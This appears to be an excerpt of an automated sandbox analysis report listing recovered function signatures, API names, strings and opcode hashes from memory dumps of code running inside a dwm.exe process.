                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value
                                                                                                                            • String ID: 1%$Y%
                                                                                                                            • API String ID: 3702945584-1395475152
                                                                                                                            • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                            • Instruction ID: 13fbe4c6b139939fe37899a14166972d1612d0360ef9c3f5d72efffbfed6cb3c
                                                                                                                            • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                            • Instruction Fuzzy Hash: 7511AF3020064471FA6867B577533E921627FC73F0F24472BB939566EADEACC6138E00
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 190073905-0
                                                                                                                            • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                            • Instruction ID: 3812768a4e1d2533d5da41b8756ff201dffa7907902ac4002edcc2a878ca687c
                                                                                                                            • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                            • Instruction Fuzzy Hash: B581A231600641BAFB54ABE5B6413F926B1BBC7B80F548717BA046779EEB7CCA458F00
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                            • String ID: api-ms-
                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                            • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                            • Instruction ID: 6e15ed0949bfb5216cb814d62189d048777d240dce15dffa5e9fec4e72e22969
                                                                                                                            • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                            • Instruction Fuzzy Hash: 0131A531312A40F1EF21EB82B6407E566B4B7CABA0F591727AD5E07791EF3DC6458B00
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                            • String ID: CONOUT$
                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                            • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                            • Instruction ID: 13c8e84db8bee54869fc96a58eb2befedfb66cda121ff3aeff9f931b6924d8d0
                                                                                                                            • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                            • Instruction Fuzzy Hash: 0E118F31310B40A6E7508B92FA8439976B0F7CAFE4F584326EA5A877A4CF7CC8148B44
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                            • String ID: dialer
                                                                                                                            • API String ID: 756756679-3528709123
                                                                                                                            • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                            • Instruction ID: 3d5b71034d731c953d380acef17a0a8a858cb0eb617b39730b5743b24673e542
                                                                                                                            • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                            • Instruction Fuzzy Hash: 19315E72701B51B2E614DF96F6507A967B0BB86B84F084232AE4847B66EF38C5A1CB00
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$Free
                                                                                                                            • String ID: C:\Windows\system32\dwm.exe
                                                                                                                            • API String ID: 3168794593-3609004125
                                                                                                                            • Opcode ID: d27b9b8ca154d9eedff1e610dfbacc8608a6d25d7c3fe3b6d17278c798082fda
                                                                                                                            • Instruction ID: d252221322fe01a850e07044becba49017ad83fb22d48e7d030e1ea0cfae6874
                                                                                                                            • Opcode Fuzzy Hash: d27b9b8ca154d9eedff1e610dfbacc8608a6d25d7c3fe3b6d17278c798082fda
                                                                                                                            • Instruction Fuzzy Hash: E2218B7B909A90BAE350DBA5BA553D937B0F78AB84F0D4127DB4983267DB2DC4048B00
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2506987500-0
                                                                                                                            • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                            • Instruction ID: 6ecae6925db91b410eb5347c0bf5a1ffd44c0f9873f60c95fa77b5d3b1e31e79
                                                                                                                            • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                            • Instruction Fuzzy Hash: CC115E3020064471FA64A7B177567A921727BC77F4F144B2AB936577E7DEACC6128E00
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 517849248-0
                                                                                                                            • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                            • Instruction ID: 19413853371ee40f0acb598bfc187d791024feb5b507f58481876cc3a84d18fc
                                                                                                                            • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                            • Instruction Fuzzy Hash: 23013931300A40A2EB109B92B55839963A1BB89BC0F584136EE5A43764DF3CC549CB00
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 449555515-0
                                                                                                                            • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                            • Instruction ID: f33bf445bdf7760a2af44414ff0acb1b6d5dc0e8c0c5ad2d4944180a6c244a64
                                                                                                                            • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                            • Instruction Fuzzy Hash: 33012975211B40B2FB249BA1FA4979A73B0BBDAB86F044726DD4907765EF3DC158CB00
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                            • String ID: csm$f
                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                            • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                                                            • Instruction ID: 754820c10d7ca8ddd124baf7920741e0348059fa2688afa5986dda01262b5f6e
                                                                                                                            • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                                                            • Instruction Fuzzy Hash: 2151D132305600BAEF55EF55FA48B9937B6F386B98F109622EA4643758DB38CA40CF00
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FinalHandleNamePathlstrlen
                                                                                                                            • String ID: \\?\
                                                                                                                            • API String ID: 2719912262-4282027825
                                                                                                                            • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                            • Instruction ID: b248dc186e862b72aa04f1c3a79110c4863411516b7807f5058bb7308de07f26
                                                                                                                            • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                            • Instruction Fuzzy Hash: 56F03C72304641B2EB608BA1FA9479A6770FB89B88F948222DA4947954DB2CC68DCF00
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CombinePath
                                                                                                                            • String ID: \\.\pipe\
                                                                                                                            • API String ID: 3422762182-91387939
                                                                                                                            • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                            • Instruction ID: 80308fa6e445d17c54fd3754542c117911dec63fcc8e00f119be8a0b6a4d6c53
                                                                                                                            • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                            • Instruction Fuzzy Hash: 07F0FE74614B84B2EB148B93BA142996671BBCAFD0F449232EE5647B19DF2CC545CB00
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                            • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                            • Instruction ID: a6f02728544225b0b75cad04884c10cb1fe7507b61ab630ef6c89d6b19d265e1
                                                                                                                            • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                            • Instruction Fuzzy Hash: 7BF06D71311B04B1FB109BA4F9443AA6331FBCABA1F54031ADA6A472E4DF3DC149CB00
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2882836952-0
                                                                                                                            • Opcode ID: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                                                                                            • Instruction ID: 99cdecd120db7dcc644be0e1b4533a4ecd12653dfbf529cfc5098a2342cb10e1
                                                                                                                            • Opcode Fuzzy Hash: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                                                                                            • Instruction Fuzzy Hash: A061C836619A40E6E7608B95F65039AB7B0F7CA794F605217FA8E47BA8DB7CC540CF00
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352247572.000001D15B050000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b050000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _set_statfp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1156100317-0
                                                                                                                            • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                            • Instruction ID: f48f86ed80d069d066ec34d36e69799dd3af1955f84793d47663f46055d792f0
                                                                                                                            • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                            • Instruction Fuzzy Hash: A0119432A10A1131FA541DECF6423E911B07BDB3B4F78472BA966072E69A2CC8414E80
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _set_statfp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1156100317-0
                                                                                                                            • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                            • Instruction ID: fbe41f5ff1faf2b99277303e5feda48857870959b524e1a68ad511e724295a50
                                                                                                                            • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                            • Instruction Fuzzy Hash: FF112432A60A5132F6F815E8F6673EE11717BEB3B4F594726A576077F68B2CC8414900
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352247572.000001D15B050000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b050000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                            • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                                                            • API String ID: 3215553584-4202648911
                                                                                                                            • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                                                            • Instruction ID: 922368ef618224816e12292326a9d68edd2fb8faa02fa7282c26e6238254bce7
                                                                                                                            • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                                                            • Instruction Fuzzy Hash: E5619F76600A4472FA659BE9F7443EA6AB1F7C3780F545B17CA0A07FE5DA3CC8418E14
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                            • String ID: MOC$RCC
                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                            • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                            • Instruction ID: d0bd359cdf572d08683b4c05e43caef215a8f04ca8f95a3626ba265ebac0a2bf
                                                                                                                            • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                            • Instruction Fuzzy Hash: C6616C33600B94AAEB20DFA5E5803DD77B0F785B98F045216EF4917BA9DB78C695CB00
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352247572.000001D15B050000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b050000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                            • String ID: csm$csm
                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                            • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                            • Instruction ID: 3e050ea8b7b9f1a7edec3d7d2f44398ca18475a58105743dc189904dda23307b
                                                                                                                            • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                            • Instruction Fuzzy Hash: 6A515A32104294BAEB648BA5B64439877F0F396B98F189317EA9987FD5CB3CD491CF00
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                            • String ID: csm$csm
                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                            • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                            • Instruction ID: 62f598ff6aacd50a850fecef7c22cdf53c4d33ccd05c06753bdc867c79d36198
                                                                                                                            • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                            • Instruction Fuzzy Hash: AD517C73100790BAEB648B95A68439977B0F796B94F144327EA8A47F96CB3CD691CF00
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352247572.000001D15B050000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b050000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                            • String ID: csm$f
                                                                                                                            • API String ID: 3242871069-629598281
                                                                                                                            • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                            • Instruction ID: 74efb88793d3c958b5e25fe4cc73c64fa9105537162f73cc0e3f17479f0242af
                                                                                                                            • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                            • Instruction Fuzzy Hash: E851AC32601700BAEB14CF95F644BA937B5F396B98F648226DE4643BC8FB38D8418F04
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352247572.000001D15B050000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b050000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                            • String ID: csm$f
                                                                                                                            • API String ID: 3242871069-629598281
                                                                                                                            • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                            • Instruction ID: cdb61b4e60006df974bc3ca30983e9ee2d019c4ef9a9ded1b475d61ac4c759ef
                                                                                                                            • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                            • Instruction Fuzzy Hash: 5E314A32201740B6EB149F51F9487A977B4F782B98F558216EE5A07B84EB3CD941CF04
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2718003287-0
                                                                                                                            • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                            • Instruction ID: 14ca9d32f14e8d393051949ca84c19eeda581d793bc0e9c647315581027601bb
                                                                                                                            • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                            • Instruction Fuzzy Hash: 4CD1E132B14A80A9E711CFB9E6403EC3BB1F396798F148316DE5997B99DB38C516CB40
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 953036326-0
                                                                                                                            • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                            • Instruction ID: f151f3711403013ac5d398874a5e3538eda2d37d311776f91f0f77b51853f4f2
                                                                                                                            • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                            • Instruction Fuzzy Hash: 7791AE72700654B5F764DFA5A6803ED2BF0B786B98F14431BDE4A67A95DB3CC486CB00
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2933794660-0
                                                                                                                            • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                            • Instruction ID: 2c708fd633f2236dcf8f71320f995c7474929aee39cc862b54e74aad3447a218
                                                                                                                            • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                            • Instruction Fuzzy Hash: AA11EC36710F05A9EB008BA0E9553A933B4F79A758F441F26DA6D477A4DF7CC1988780
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileType
                                                                                                                            • String ID: \\.\pipe\
                                                                                                                            • API String ID: 3081899298-91387939
                                                                                                                            • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                            • Instruction ID: 2819aa174bf0c1d77fd6e52fad825b7ef98657248b59c8f3fe6f660c6752a391
                                                                                                                            • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                            • Instruction Fuzzy Hash: 4171B236200781B6E7249EA6BA543EA67B4F7CA784F544227FD0A53B89DE39C745CF00
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352247572.000001D15B050000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b050000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallTranslator
                                                                                                                            • String ID: MOC$RCC
                                                                                                                            • API String ID: 3163161869-2084237596
                                                                                                                            • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                            • Instruction ID: cb7ffad28ed99ff4322c2ada1ec486d651d06a8b3c0cda77b37e679ea28511c1
                                                                                                                            • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                            • Instruction Fuzzy Hash: E3619D33604B84AAEB20DFA5E5403DD77B0F385B88F145616EF4917B99DB38D595CB00
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileType
                                                                                                                            • String ID: \\.\pipe\
                                                                                                                            • API String ID: 3081899298-91387939
                                                                                                                            • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                            • Instruction ID: 866e4a9ae356574c6996f9417197924f74e437daade12466e1d18dc98b918206
                                                                                                                            • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                            • Instruction Fuzzy Hash: 8A51C132204781B1F664DAAAB6683EA6771F3D7780F451327EE5A03B99DA3DC6048F50
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                            • String ID: U
                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                            • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                            • Instruction ID: f7da365366da3cfdd1df1fc3b9ac3f039b7ba75be384a60d4e677f9f9a89cabe
                                                                                                                            • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                            • Instruction Fuzzy Hash: 54418032615A80A6EB209F65F9443EAB7B0F7D9794F504222EE4D87798EB7CC541CB40
                                                                                                                            APIs
                                                                                                                            Strings
